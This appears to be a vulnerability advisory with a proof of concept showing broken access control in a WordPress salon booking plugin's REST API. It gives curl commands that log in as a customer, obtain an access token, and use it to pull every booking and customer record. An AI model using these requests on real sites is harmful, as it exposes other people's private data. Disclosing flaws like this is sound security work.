The plugin does not have proper authorisation in some of its endpoints, which could allow customers to access all bookings and other customer’s data
Make a booking to get a customer account
Login via API and get access token: curl "https://example.com/?rest_route=/salon/api/v1/login&[email protected]&password=11111111"
response: {"status":"OK","access_token":"5ad1d8d73d058958e98987bec31a12d25c14b9ba"}
Send requests to get all bookings/customers data using the access token
curl "http://example.com/?rest_route=/salon/api/v1/bookings/" -H "Access-Token:5ad1d8d73d058958e98987bec31a12d25c14b9ba"
curl "http://example.com/?rest_route=/salon/api/v1/customers/" -H "Access-Token:5ad1d8d73d058958e98987bec31a12d25c14b9ba"